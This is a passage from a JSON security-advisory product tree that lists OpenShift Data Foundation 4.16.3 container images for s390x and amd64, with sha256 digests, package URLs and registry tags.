"purl": "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"product_identification_helper": {
